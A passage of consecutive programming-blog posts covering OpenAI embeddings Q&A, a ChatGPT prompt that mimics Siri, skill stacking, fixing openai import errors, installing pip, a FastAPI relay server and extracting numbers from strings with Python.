  4. Wait for the scraping to complete: The script will take some time to scrape the website and save the text files to disk. You can monitor the progress by looking at the console output.
  5. Ask questions: After the scraping is complete, you can use the answer_question function in Step 12 to ask questions based on the scraped text. The function takes in a dataframe containing the scraped text, a question to ask, and several optional parameters. You can modify the question and other parameters to suit your needs.

Note that the script is intended as a demonstration of how to use OpenAI’s language models to answer questions based on scraped text, and may require modification to work with different websites or to answer different types of questions. It also requires an OpenAI API key to use. You can sign up for an API key on the OpenAI website.

What Is an Embedding in This Context?

💡 In natural language processing, an embedding is a way to represent words or phrases as numerical vectors. These vectors capture semantic and contextual information about the words and phrases, and can be used to train machine learning models for various tasks such as text classification, sentiment analysis, and question answering.

In this script, the embeddings are created using OpenAI’s language models, and they are used to encode the text from the scraped web pages into a numerical format that can be analyzed and searched efficiently.

The embeddings are created by feeding the text through OpenAI’s text-embedding-ada-002 engine, which is designed to create high-quality embeddings for a wide variety of text-based applications.

The resulting embeddings are stored in the DataFrame and used to find the most similar context to a question in order to provide accurate and reliable answers.

👉 Recommended: How to Install OpenAI in Python?

If you want to improve your web scraping skills, check out the following course on the Finxter academy:

Posted on Leave a comment

How I Built a Virtual Assistant like Siri using ChatGPT Prompting (No Code!)

5/5 – (2 votes)

Siri sucks. 😞

I am a Siri user, and Siri fails me more than it performs for me. It doesn’t understand the chain of commands.

Project Idea: Recreate Siri Using ChatGPT

This got me thinking, “What if I can repurpose ChatGPT to work like Siri?”. So before I tell you how the prompt looks like this is what the chatbot can recognise in the most natural form:

  • Increase volume
  • Decrease volume
  • Play movie
  • Pause or stop the movie
  • Open an app
  • Book a movie or movie ticket
  • Play song
  • Book a cab
  • Call someone
  • Set a reminder
  • Send a message
  • Set an alarm
  • Open a website
  • Get directions
  • Check the weather

To trigger these commands, the user needed to begin the instruction with "Hey Nik".

Let me begin by showing you the most complicated instruction it can handle

Prompt First Trial – Not Perfect Yet

Nik: Assume it's sunny. Hey Nik check the weather for me and if it's sunny book a cab to go to the beach, play song california love by 2Pac ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it's sunny. Here are the commands: [WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Nik: Assume it’s sunny. Hey Nik check the weather for me and if it’s sunny book a cab to go to the beach, play song california love by 2Pac

ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it’s sunny. Here are the commands:

[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Please note that the cab booking will not be completed as this is a simulated environment.

ChatGPT is not aware of my environment hence I had to tell them that it’s sunny. And then I start with "Hey Nik...". In contrast, Google & Siri cannot handle this.

After a good deal of prompt engineering, I came up with the following prompt that could be used by an app to not only detect user meaning but also respond accordingly — without needing to create a single line of code to accomplish this magic!

ChatGPT truly can be used as the heart of many applications — not just to create them!

Final Prompt

You can copy and paste this prompt in case you want to reuse it to build your own Siri replacement:

Nik: I want you to be an interactive chatbot that responds to predefined instructions. The instructions and their respective commands are: Increase volume: [INCREASEVOLUME] Decrease volume: [DECREASEVOLUME] Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]] Pause or stop the movie: [STOPMOVIE] Open an app [APP NAME]: [OPENAPP [APP NAME]] Book a movie or movie ticket: [OPENAPP BOOKMYSHOW] Play song [song or artist name]: [PLAYSONG [song or artist name]] Book a cab: [OPENAPP UBER] Call someone [NAME]: [CALL [NAME]] Set a reminder [TIME] [REMINDER]: [SETREMINDER [TIME] [REMINDER]] Send a message [NAME] [MESSAGE]: [SENDMESSAGE [NAME] [MESSAGE]] Set an alarm - [SETALARM [time]] Open a website - [OPEN [website name]] Get directions - [DIRECTIONTO [location]] Check the weather - [WEATHER] Here are some conditions to consider: If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command. If the instruction includes the name of an app when using OPENAPP, append it to the command. To trigger these commands, begin the instruction with "Hey Nik". Please note that commands will be in square brackets, with spaces removed except for messages or names. Your response should contain an acknowledgement in English and below it should be the sequence of commands. After you display the commands do not print anything else.

I came up with the following commands on the first attempt

  • Increase volume: [INCREASE VOLUME]
  • Decrease volume: [DECREASEVOLUME]
  • Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
  • Pause or stop the movie: [STOPMOVIE]
  • Open an app [APP NAME]: [OPENAPP [APP NAME]]
  • Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
  • Play song [song or artist name]: [PLAYSONG [song or artist name]]
  • Book a cab: [OPENAPP UBER]

After I perfected the results, I wanted to see if ChatGPT could add more commands, so I tried the following prompt

Refinement Prompt

Nik: Can you add more commands in the style given to the prompt. Take inspiration from "ok google" and "hey siri" Please write in English language. ChatGPT: Sure, I can add more commands in the style given to the prompt! Here are some additional commands you can use: To set a reminder, say "Hey Nik, set a reminder for [time] to [task]". For example, "Hey Nik, set a reminder for 2pm to attend a meeting". To check the weather, say "Hey Nik, what's the weather like today?". To get directions, say "Hey Nik, how do I get to [location]?". For example, "Hey Nik, how do I get to Central Park?". To set an alarm, say "Hey Nik, set an alarm for [time]". For example, "Hey Nik, set an alarm for 7am". To send a message, say "Hey Nik, send a message to [contact name]". You will then be prompted to dictate the message and confirm before sending. To open a website, say "Hey Nik, open [website name]". For example, "Hey Nik, open Google". Remember to begin each command with "Hey Nik" for the chatbot to respond. I hope these additional commands are helpful! Nik:Ok now generate the original prompt with the newly added commands Please write in English language.

My Personal Considerations and Findings Using This Prompt

I am impressed with ChatGPT’s ability to generate a more user-friendly and straightforward set of commands. And it also kept modifying my original prompt to include these commands. 

But, I realized that there were some conditions that I needed to consider, such as:

  • If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
  • If the instruction includes the name of an app when using OPENAPP, append it to the command.

With these conditions in mind, I combined the original set of commands with the new commands generated by ChatGPT and added the necessary conditions to create a more comprehensive and user-friendly prompt.

As I developed the chatbot, I discovered that one of its most significant advantages over Siri was its ability to handle an unlimited set of inputs. Siri, on the other hand, works with one command at a time, which can be limiting for users who want to execute multiple tasks in one go.

Here are some examples of user inputs and their respective responses:

User Input: Hey Nik, play movie The Shawshank Redemption Response: [PLAYMOVIE The Shawshank Redemption] User Input: Hey Nik, increase volume by 50 percent Response: [INCREASEVOLUME 50 percent]

User Input: Hey Nik, send a message to John saying I will be there in 10 minutes  Response: [SENDMESSAGE John I will be there in 10 minutes] User Input: Hey Nik, what is the weather like in New York? Response: [WEATHER New York]

Here is an example of the user input and response for the “play song” command:

User input: Hey Nik, play song Shape of You by Ed Sheeran Response: Playing Shape of You by Ed Sheeran Command: [PLAYSONG Shape of You by Ed Sheeran]

And here is an example of the user input and response for the "open an app" command:

User input: Hey Nik, open app Netflix Response: Opening Netflix Command: [OPEN APP NETFLIX]

How to Deploy This

To deploy it as an app, you can use the ChatGPT API + Promptable + Any No Code App Builder, the app can be deployed on iPhone, but there are many permissions that need to be worked out.

A similar version of this may work on Android as it is more open.

👉 Recommended: ChatGPT at the Heart – Building a Movie Recommendation Python Web App

Posted on Leave a comment

A Simple Hack to Becoming the World’s Best Person in Something as an Average Guy

5/5 – (1 vote)

Millionaires are made at the top of the income distribution.

For example, have a look at the following Pareto distribution exemplifying how only the top sports players make all the money:

If you want to earn a million dollars quickly, you need to become one of the top people in the world at something the market values.

Sounds hard? You don’t actually have the skills to become a top person in a field such as sports, coding, or business?

Don’t worry — becoming one of the best persons at something is actually easy. Everybody can do it — with the right strategy. I call it “skills stacking”. This article explains the simple idea, so let’s get started! 👇

Skills Stacking – Basic Idea

The idea of becoming the best person in the world can be a daunting task, but it’s not an impossible one. Many people believe that to achieve greatness, one must have extraordinary talent or be born with a special gift. However, this is a myth. It’s possible to become the best person in the world by focusing on developing a combination of skills rather than a single skill.

💡 Skill stacking is improving a combination of 6-8 skills individually so that you become one of the top people in your field in the combination of these skills. The combination of skills must all be important in your line of work.

For example, suppose an average guy is in the top 10% of three different skills. In that case, he moves to the top 10% * 10% * 10% = 0.1% in the combination of those three skills. He is the most skilled person out of 1000 randomly chosen persons, in that combination of skills. This means that by becoming merely good in three different areas, an average guy can become one of the best people in his field.

Example of skill stacking: Learning seven skills can be enough to become the best out of 1.3 billion people!

In the spreadsheet, a coder focuses on learning

One special skill of this coder is smiling, which they use heavily in their day-to-day work to increase customer satisfaction and create value. Don’t underestimate the simple talents!

The coder may just offer their freelancing services in the area of OpenAI and prompt engineering using Python — and invest their income in the stock market. And they can be wildly successful with this strategy, easily reaching multi-millionaire status!

👉 Recommended: How to Become a Millionaire – The Simple Math

The concept of going to the top in a combination of skills is simple yet powerful.

How to Stack Skills?

So, how does one go about developing a combination of skills to become the best person in the world?

The first step is to identify the skills you want to develop. These skills should be different but complementary, meaning that they should enhance each other.

For example, if you’re interested in becoming a great public speaker, you might also want to work on your writing skills and your ability to connect with people.

Once you have identified the skills you want to develop, the next step is to start practicing. This requires dedication, hard work, and a willingness to learn from your mistakes.

However, it’s not so hard to reach the top 10% or so in a skill — just read a couple of books about this skill and you have done more than most people ever will!

A Few Words on Persistence

Another essential factor in becoming the best person in the world is persistence. Success is rarely achieved overnight, and setbacks are inevitable. However, those who are persistent and keep pushing through their failures are the ones who ultimately succeed. As the saying goes, “practice makes perfect,” and the more you practice, the better you become.

In addition to developing a combination of skills and persistence, it’s also essential to seek out opportunities to showcase your skills. Whether it’s through public speaking engagements, writing articles, or participating in competitions, putting yourself out there is crucial to becoming the best person in the world. This not only helps you gain recognition for your skills but also helps you learn from others and grow as a person.

👉 Recommended: Intelligence vs Persistence – What’s More Important for Your Coding Success?

Conclusion

In conclusion, becoming the best person in the world as an average guy is possible. It requires a combination of skills, persistence, and the willingness to take risks and put yourself out there.

By focusing on developing a variety of skills, an average guy can move to the top of his chosen field and become one of the best people in the world.

Action Steps: Identify the skills you want to develop, put in the time and effort required, and don’t give up.

Who knows, you might just end up surprising yourself and the world!

Bonus – Exponential Skill Stacking

A great way to increase your odds is to stack “exponential skills”, i.e., skills that become exponentially more demanded yearly.

  • Programming
  • Blockchain Development
  • Machine Learning
  • ChatGPT and OpenAI
  • Freelancing

By stacking these skills, your stack becomes more valuable over time, not less. You can master many exponential skills at the Finxter academy:

Posted on Leave a comment

ModuleNotFoundError: No Module Named OpenAI

5/5 – (1 vote)

Quick Fix: Python raises the ImportError: No module named 'openai' when it cannot find the library openai. The most frequent source of this error is that you haven’t installed openai explicitly with pip install openai. Alternatively, you may have different Python versions on your computer, and openai is not installed for the particular version you’re using.

Before I dive into the tutorial, try out one of the following solutions (quick fix):

# ✅ Python 2 or Virtual Environment pip install openai # ✅ Python 3
pip3 install openai # ✅ Python 3.10
pip3.10 install openai # ✅ If you get a Permission Error
sudo pip3 install openai # ✅ If pip is not in your PATH environment variable
python -m pip install openai # ✅ Python 3 if pip is not in your PATH
python3 -m pip install openai # ✅ Python 3.10 if pip is not in your PATH
python3.10 -m pip install openai # ✅ Anaconda
conda install -c conda-forge openai

Problem Formulation

You’ve just learned about the awesome capabilities of the openai library and you want to try it out, so you start your code with the following statement:

import openai

This is supposed to import the OpenAI library into your (virtual) environment. However, it only throws the following ImportError: No module named 'openai':

>>> import openai
Traceback (most recent call last): File "<pyshell#6>", line 1, in <module> import openai
ModuleNotFoundError: No module named 'openai'

Solution Idea 1: Install Library OpenAI

The most likely reason is that Python doesn’t provide openai in its standard library. You need to install it first!

Before being able to import the OpenAI module, you need to install it using Python’s package manager pip. Make sure pip is installed on your machine.

To fix this error, you can run the following command in your Windows shell:

$ pip install openai

This simple command installs openai in your virtual environment on Windows, Linux, and MacOS. It assumes that your pip version is updated. If it isn’t, use the following two commands in your terminal, command line, or shell (there’s no harm in doing it anyways):

$ python -m pip install --upgrade pip
$ pip install openai

💡 Note: Don’t copy and paste the $ symbol. This just illustrates that you run it in your shell/terminal/command line.

Solution Idea 2: Fix the Path

The error might persist even after you have installed the openai library. This likely happens because pip is installed but doesn’t reside in the path you can use. Although pip may be installed on your system the script is unable to locate it. Therefore, it is unable to install the library using pip in the correct path.

To fix the problem with the path in Windows follow the steps given next.

Step 1: Open the folder where you installed Python by opening the command prompt and typing where python

Step 2: Once you have opened the Python folder, browse and open the Scripts folder and copy its location. Also verify that the folder contains the pip file.

Step 3: Now open the Scripts directory in the command prompt using the cd command and the location that you copied previously.

Step 4: Now install the library using pip install openai command. Here’s an analogous example:

After having followed the above steps, execute our script once again. And you should get the desired output.

Other Solution Ideas

  • The ModuleNotFoundError may appear due to relative imports. You can learn everything about relative imports and how to create your own module in this article.
  • You may have mixed up Python and pip versions on your machine. In this case, to install openai for Python 3, you may want to try python3 -m pip install openai or even pip3 install openai instead of pip install openai
  • If you face this issue server-side, you may want to try the command pip install --user openai
  • If you’re using Ubuntu, you may want to try this command: sudo apt install openai
  • You can check out our in-depth guide on installing openai here.
  • You can also check out this article to learn more about possible problems that may lead to an error when importing a library.

Understanding the “import” Statement

import openai

In Python, the import statement serves two main purposes:

  • Search the module by its name, load it, and initialize it.
  • Define a name in the local namespace within the scope of the import statement. This local name is then used to reference the accessed module throughout the code.

What’s the Difference Between ImportError and ModuleNotFoundError?

What’s the difference between ImportError and ModuleNotFoundError?

Python defines an error hierarchy, so some error classes inherit from other error classes. In our case, the ModuleNotFoundError is a subclass of the ImportError class.

You can see this in this screenshot from the docs:

You can also check this relationship using the issubclass() built-in function:

>>> issubclass(ModuleNotFoundError, ImportError)
True

Specifically, Python raises the ModuleNotFoundError if the module (e.g., openai) cannot be found. If it can be found, there may be a problem loading the module or some specific files within the module. In those cases, Python would raise an ImportError.

If an import statement cannot import a module, it raises an ImportError. This may occur because of a faulty installation or an invalid path. In Python 3.6 or newer, this will usually raise a ModuleNotFoundError.

Related Videos

The following video shows you how to resolve the ImportError:

YouTube Video

The following video shows you how to import a function from another folder—doing it the wrong way often results in the ModuleNotFoundError:

YouTube Video

How to Fix “ModuleNotFoundError: No module named ‘openai’” in PyCharm

If you create a new Python project in PyCharm and try to import the openai library, it’ll raise the following error message:

Traceback (most recent call last): File "C:/Users/.../main.py", line 1, in <module> import openai
ModuleNotFoundError: No module named 'openai' Process finished with exit code 1

The reason is that each PyCharm project, per default, creates a virtual environment in which you can install custom Python modules. But the virtual environment is initially empty—even if you’ve already installed openai on your computer!

Here’s a screenshot exemplifying this for the pandas library. It’ll look similar for openai.

The fix is simple: Use the PyCharm installation tooltips to install OpenAI in your virtual environment—two clicks and you’re good to go!

First, right-click on the openai text in your editor:

Second, click “Show Context Actions” in your context menu. In the new menu that arises, click “Install OpenAI” and wait for PyCharm to finish the installation.

The code will run after your installation completes successfully.

As an alternative, you can also open the Terminal tool at the bottom and type:

$ pip install openai

If this doesn’t work, you may want to set the Python interpreter to another version using the following tutorial: https://www.jetbrains.com/help/pycharm/2016.1/configuring-python-interpreter-for-a-project.html

You can also manually install a new library such as openai in PyCharm using the following procedure:

  • Open File > Settings > Project from the PyCharm menu.
  • Select your current project.
  • Click the Python Interpreter tab within your project tab.
  • Click the small + symbol to add a new library to the project.
  • Now type in the library to be installed, in your example OpenAI, and click Install Package.
  • Wait for the installation to terminate and close all popup windows.

Here’s an analogous example:

Here’s a full guide on how to install a library on PyCharm.

Posted on Leave a comment

How to Install Pip? 5 Easy Steps

5/5 – (1 vote)

In this article, I’ll quickly guide you through the installation steps for Python’s package installer pip. But first things first: 👇

What Is Pip?

✅ pip is the package installer for Python used to install and manage software packages (also known as libraries or modules) written in Python. pip makes it easy to install, upgrade, and uninstall packages in your Python environment.

When you install a package with pip, it automatically downloads and installs any dependencies required by the package, making it very convenient for managing your Python projects. You can use pip from the command line but it also integrates with popular development environments like Jupyter, PyCharm, and Visual Studio Code.

Is Pip Already Included in Python?

pip is included with Python distributions from version 3.4 onwards, so if you have a recent version of Python installed, you should already have pip.

✅ Recommended: How to Check Your Python Version?

If you don’t have pip installed, you can easily install it using the steps outlined as follows:

5 Steps to Install Pip Easily

To install pip in Python, follow these steps:

  1. Check if pip is already installed by running the command “pip -V” in your command prompt or terminal. If you see a version number, pip is already installed. If not, proceed to step 2.
  1. Download the get-pip.py script from the official Python website (see below).
  2. Open a command prompt or terminal and navigate to the directory where you downloaded the get-pip.py script.
  3. Run the command python get-pip.py to install pip.
  4. Verify that pip is installed by running the command pip -V.

That’s it! You should now have pip installed and ready to use in your Python environment.

In case you weren’t able to complete step 2, here’s how to do it quickly:

How to Download get-pip.py from Official Python?

To download the get-pip.py script from the official Python website, follow these steps:

  1. Open a web browser and go to the following URL: https://bootstrap.pypa.io/get-pip.py
  2. Right-click on the page and select “Save As” (or similar option) to download the file.
  3. Choose a directory to save the file to and click “Save”.
  4. Once the download is complete, navigate to the directory where you saved the file.

Alternatively, you can use the following command in your command prompt or terminal to download the file directly:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

This will download the get-pip.py file to your current working directory.

Are There Other Ways to Install Pip?

Yes, there are a few other ways to install pip depending on your operating system and Python distribution.

Here are the three most common methods:

  1. Package managers: Many Linux distributions include pip in their package repositories, which means you can use your distribution’s package manager to install it. For example, on Ubuntu, you can use the following command: sudo apt-get install python-pip.
  2. Python installers: Some Python distributions come with pip pre-installed, such as Anaconda and ActivePython. If you are using one of these distributions, you should already have pip installed.
  3. Python package installer: Another way to install pip is by using the ensurepip module, which is included with Python since version 3.4. You can use the following command: python -m ensurepip --default-pip.

Regardless of the method you choose, it’s always a good idea to verify that pip is installed and working correctly by running the command pip -V.

How to Upgrade Pip?

To upgrade pip to the latest version, follow these steps:

Step 1: Open a command prompt or terminal and enter the following command to upgrade pip:

python -m pip install --upgrade pip

The previous command was for Linux or macOS. For Windows, you may want to use:

 py -m pip install --upgrade pip

Step 2: Depending on your system configuration, you may need to run this command with administrator privileges. On Linux or macOS, you can use sudo to run the command as root, like this:

sudo python -m pip install --upgrade pip

Step 3: pip will download and install the latest version of itself. Once the upgrade is complete, you can verify that pip is up to date by running the command:

pip --version

This will display the version number of the newly installed pip.


That’s it! You should now have the latest version of pip installed on your system.

Note that it’s a good idea to keep pip up to date to take advantage of bug fixes, security updates, and new features. You can check for updates to individual packages installed with pip using the pip list --outdated command, and upgrade them with pip install --upgrade <package>.

✅ Recommended: Pip Commands — The Ultimate Guide

Posted on Leave a comment

BrainWaves P2P Social Network – How I Created a Basic Server

5/5 – (1 vote)

Welcome back to the Brainwaves P2P project, or at least my take on it :-).

The previous article was a theoretical explanation of how I envision this project. It is now time to start laying the groundwork!

I learn as I go…

As some of you might have guessed already, I’m a completely self-taught coder. Because of that, I’m sure many professionals might not agree with how I code.

I accept that and will welcome any constructive criticism. I have been learning non-stop since I started this project. I assume this will not slow down anytime soon. YouTube is my main source of knowledge as I learn best when seeing something done. I am, in other words, a visual learner. I found an article that explains it well here.

Articles on various sites are the other half of how I learn new concepts in coding. That is how I found Finxter :-).

So to sum it up, my code is far from perfect, and I will never claim it is. This is my take on trying to solve this puzzle. I actually look forward to alternative approaches!

You can open issues on my GitHub if you want to address something.

Now that we all know where we stand let us dive right in! How to build a server for our peer-to-peer social network app?

Flask vs FastAPI

In the previous article, I mentioned that I want to use FastAPI to build the relay server, as opposed to Flask. As I have done before and will do again, I asked ChatGPT about the differences between Flask and FastAPI.

🤖 Flask vs FastAPI Flask is based on the Werkzeug WSGI (Web Server Gateway Interface) toolkit, which is synchronous by default. However, Flask can still be used to build asynchronous applications. You will need to use a third-party library like gevent or asyncio. With these libraries, Flask can use coroutines and event loops to handle I/O operations asynchronously. FastAPI, on the other hand, is designed to be fully asynchronous from the ground up. It uses the async/await syntax of Python to write asynchronous code. It is based on the ASGI (Asynchronous Server Gateway Interface) specification. FastAPI uses the Starlette framework as its foundation. the framework provides a high-performance event loop and asynchronous request handlers.

Both the speed and the asynchrony determined my choice for FastAPI.

Those of you familiar with Flask will know about its built-in development server. As FastAPI doesn’t have this, we’ll need to install a separate server.

Uvicorn Server

This is where I encountered my first small hiccup. I code on Windows (I know, sue me 😝), and I wanted to use Uvicorn. As this only runs on Linux, I needed to get it to function in WSL.

I’ll not go into all the details here, but I could write something about it if anyone has an interest in it. Let me know!

After getting Uvicorn to function as it should, we can continue. It is important to remember that the Python interpreter on WSL does not share anything with its Windows counterpart. This means that you either need two separate virtual environments or that you install pip packages for each OS.

Creating Basic FastAPI App

Once all this annoying prep work is done, creating a basic FastAPI app is very easy. We first import FastAPI as below:

from fastapi import FastAPI

All you need to do afterward is define the basic app and create an endpoint.

#---APP INIT---#
app = FastAPI() @app.get("/")
async def root(): return {"message": "Hello World"}

To get this to run, you need to navigate to the working directory of your FastAPI project via WSL. Afterward, you call the Uvicorn server. The command below assumes you called your Python file main.py!

uvicorn main:app --reload

I usually run the Uvicorn server in a separate terminal instance of WSL.

That way, I can leave it on and test any changes I make immediately. Later, when I’ll be working on the client also, I can split the terminal. You can then make API calls through the client terminal window. FastAPI’s response in the server WSL window is then visible immediately.

Receiving “Hello World” from Server

If you now navigate to 127.0.0.1:8000 you should get a JSON response with the "Hello World" we returned in the endpoint above. We will change this endpoints function later, but for now, it works to prove our API is working.

For the API server, I have the following layout in mind. It might change throughout the development process. I currently foresee two endpoints that do not require the user to be logged in with a JWT token. The first will be to get that token, and the second to register a new user. Everything else will require the user to be authenticated.

I stated earlier that I would change the root’s endpoint function. Its new role is now to allow a user to request a JWT token. The token is only granted after providing a correct combination of username and password. This requires a dedicated set of both helper functions and Pydantic models to work.

I will go into this in another article, as it requires much explaining :-). It was something I am still learning myself.

Endpoint Layout

The current layout of my endpoints at a high level is the following:

#---OPEN ENDPOINTS---# #Root route to get token
@app.post("/", response_model=Token) #Route to create a new user
@app.post("/api/v1/users") #---AUTH ENDPOINTS---# #Route to get all current users and their attributes(development only)
@app.get("/api/v1/users") #Route to test if the token is valid, used while authenticating
@app.get("/api/v1/token-test") #Route to get all thoughts/messages created by a certain user
@app.get("/api/v1/thoughts/{username}") #Route to return all thoughts/messages containing the query string
@app.get("/api/v1/thoughts/{query_str}") #Route to create a new message/thought
@app.post("/api/v1/thoughts") #Route to return all info about the current user(like a user profile)
@app.get("/api/v1/me", response_model=User)

The current setup should allow for the barebones functionality of the application. At least from a server point of view. The routes above and/or their function are liable to change during development.  I do find it helps to have a visual reminder of what I am working toward. That is why I created the high-level outlay. As you might recall, I am a visual learner 😀.

Database Considerations

I will dedicate the last part of this article to the database part. As we need to store both users, user credentials, and messages/tweets somewhere, a database is a must.

If you have read any of my previous articles, you will know I like Deta a lot.

Their NoSQL databases work great for development. They recently evolved into Deta Space. This change makes their ecosystem even more interesting for developers. The fact that they are free is also important for a single developer coding this app on his own time 😝. Make sure to check them out!

The next article will focus on both the database code and the Pydantic models we will need to get our API to function.

As always, feel free to ask me questions or pass suggestions! And check out the GitHub repository for participation!

👉 GitHub: https://github.com/shandralor/PeerBrain

Posted on Leave a comment

How To Extract Numbers From A String In Python?

5/5 – (4 votes)

The easiest way to extract numbers from a Python string s is to use the expression re.findall('\d+', s). For example, re.findall('\d+', 'hi 100 alice 18 old 42') yields the list of strings ['100', '18', '42'] that you can then convert to numbers using int() or float().

There are some tricks and alternatives, so keep reading to learn about them. 👇

In particular, you’ll learn about the following methods to extract numbers from a given string in Python:

Problem Formulation

Extracting digits or numbers from a given string might come up in your coding journey quite often. For instance, you may want to extract certain numerical figures from a CSV file, or you need to separate complex digits and figures from given patterns.

Having said that, let us dive into our mission-critical question:

Problem: Given a string. How to extract numbers from the string in Python?

Example: Consider that you have been given a string and you want to extract all the numbers from the string as given in the following example:

Given is the following string:

s = 'Extract 100, 1000 and 10000 from this string'

This is your desired output:

[100, 1000, 10000]

Let us discuss the methods that we can use to extract the numbers from the given string:

Method 1: Using Regex Module

The most efficient approach to solving our problem is to leverage the power of the re module. You can easily use Regular Expressions (RegEx) to check or verify if a given string contains a specified pattern (be it a digit or a special character, or any other pattern).

Thus to solve our problem, we must import the regex module, which is already included in Python’s standard library, and then with the help of the findall() function we can extract the numbers from the given string.

Learn More: re.findall() is an easy-to-use regex function that returns a list containing all matches. To learn more about re.findall() check out our blog tutorial here.

Let us have a look at the following code to understand how we can use the regex module to solve our problem:

import re sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)]
print(s)

Output

[100.0, 100.45, 10000.0]

This is a Python code that uses the re module, which provides support for regular expressions in Python, to extract numerical values from a string.

Code explanation: 👇

The line s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] uses the re.findall() function from the re module to search the sentence string for numerical values.

Specifically, it looks for strings of characters that match the regular expression pattern r'-?\d+.?\d*'. This pattern matches an optional minus sign, followed by one or more digits, followed by an optional decimal point, followed by zero or more digits.

The re.findall() function returns a list of all the matching strings.

The list comprehension [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] takes the list of matching strings returned by findall and converts each string to a floating-point number using the float() function. This resulting list of floating-point numbers is then assigned to the variable s.

👉 Recommended: Python List Comprehension

Method 2: Split and Append The Numbers To A List using split() and append()

Another workaround for our problem is to split the given string using the split() function and then extract the numbers using the built-in float() method then append the extracted numbers to the list.

Note:

  • split() is a built-in python method which is used to split a string into a list.
  • append() is a built-in method in python that adds an item to the end of a list.

Now that we have the necessary tools to solve our problem based on the above concept let us dive into the code to see how it works:

sentence = 'Extract 100 , 100.45 and 10000 from this string' s = []
for t in sentence.split(): try: s.append(float(t)) except ValueError: pass
print(s)

Output

[100.0, 100.45, 10000.0]

Method 3: Using isdigit() Function In A List Comprehension

Another approach to solving our problem is to use the isdigit() inbuilt function to extract the digits from the string and then store them in a list using a list comprehension.

The isdigit() function is used to check if a given string contains digits. Thus if it finds a character that is a digit, then it returns True. Otherwise, it returns False.

Let us have a look at the code given below to see how the above concept works:

sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [int(s) for s in str.split(sentence) if s.isdigit()]
print(s)

Output

[100, 10000]

☢ Alert! This technique is best suited to extract only positive integers. It won’t work for negative integers, floats, or hexadecimal numbers.

Method 4: Using Numbers from String Library

This is a quick hack if you want to avoid spending time typing explicit code to extract numbers from a string.

You can import a library known as nums_from_string and then use it to extract numbers from a given string. It contains several regex rules with comprehensive coverage and can be a very useful tool for NLP researchers.

Since the nums_from_string library is not a part of the standard Python library, you have to install it before use. Use the following command to install this useful library:

pip install nums_from_string

The following program demonstrates the usage of nums_from_string :

import nums_from_string sentence = 'Extract 100 , 100.45 and 10000 from this string'
print(nums_from_string.get_nums(sentence))

Output

[100.0, 100.45, 10000.0]

Conclusion

Thus from the above discussions, we found that there are numerous ways of extracting a number from a given string in python.

My personal favorite, though, would certainly be the regex module re.

You might argue that using other methods like the isdigit() and split() functions provide simpler and more readable code and faster. However, as mentioned earlier, it does not return numbers that are negative (in reference to Method 2) and also does not work for floats that have no space between them and other characters like '25.50k' (in reference to Method 2).

Furthermore, speed is kind of an irrelevant metric when it comes to log parsing. Now you see why regex is my personal favorite in this list of solutions.

If you are not very supportive of the re library, especially because you find it difficult to get a strong grip on this concept (just like me in the beginning), here’s THE TUTORIAL for you to become a regex master. 🤯🤯

I hope you found this article useful and added some value to your coding journey. Please stay tuned for more interesting stuff in the future.

Posted on Leave a comment

I Created a ChatGPT-Powered Website Creator with ChatGPT – Here’s What I Learned

5/5 – (3 votes)

 I wanted to learn how to use the new Large Language Model AI GPT created by OpenAI. I also wanted to know if it could be used in a practical web application.

Here’s my video: 🤯

YouTube Video

To learn it, I created a website that uses it in two ways. I used it to create the web application. The web application I created uses GPT-3 to create other simple web pages or one-page web applications.

A Few Words on ChatGPT

GPT stands for Generative Pre-trained transformer.

I examined its background is clearly explained in depth in its wiki article and why it works is written in a great article by Stephen Wolfram. GPT is a high-powered autocomplete that creates paragraphs and words based on their statistical association. It adds randomness to this selection, so it does not always return the same result given the same prompt.

 I witnessed how it can enable great applications in multiple ways. 👇

  • ChatGPT Usage 1: Text autocompletes can be used superbly to write well-written code. 
  • ChatGPT Usage 2: It can also be used in the application to enable or enhance its functionality. 
  • ChatGPT Usage 3: The coder can also use it to expedite learning and create new code.

In creating the website, I found the latter to be the most useful.

This article guides you through how I used and created a website that can generate a website from a text prompt. Open AI’s GPT Da Vinci powers the site. I used Open AI’s Chat GPT to create much of its code. 

I also used GPT-3 based ghostwriter code assistant in the Replit IDE or interactive development environment for auto-completion. I also examine how I used prompt engineering for development, Flask, and JavaScript to create its functionality. 

The GPT-3 Website Prototyper Site

Here’s an example of what the site looks like:

Here’s an example of a pong game created with it just from entering the above prompt text:

How the Application Works

Let’s first see what the site does before we look into its code.

Here’s the site https://web-prototyper.kevron.repl.co/. Go to the site and enter a prompt.  

Here are some example prompts:

  • “Create an HTML pong game with javascript and an AI”
  • “Create an HTML page with street address, zip code, first name, last name, and a date picker for the birthdate.”

Here’s a site that gives you information on prompt engineering from OpenAI. If you want to create a website, you’ll have some keywords like “JavaScript” and “HTML”. In addition, you can add CSS and colors to your site. 

Then Click on the Create button that gets the output from the GPT API Davinci. Enter a name. Then save.

You can click on the link to go to the site. You can also click on the code to view the code. You should remember that the code it generates has some randomness to it, and it won’t always return the same result.

How I Created the GPT-3 Website Prototyper Site

I wrote some of this website’s code using Chat-GPT and then manually put the pieces together.

This is a gap in the AIs and where the programmers come in. They can’t see the big picture and put together pieces of code from different sites like

  • Stack Overflow,
  • Google,
  • Finxter, and
  • Chat GPT.

Chat GPT, on the other hand, can only use code already processed on its site.  Throughout the creation of this site, I used these sources to look up how to create this site. I could not just use Chat GPT. 

One of the current gaps humans can fill that Chat generators can’t, even though they are impressive, is tying large pieces and concepts together accurately. So I had to manually tie together the front end, backend, and saving functionality.

Here’s the prompt used to create the Flask backend.

This generated back-end Flask python code and JavaScript code, the JavaScript code called the Flask backend.

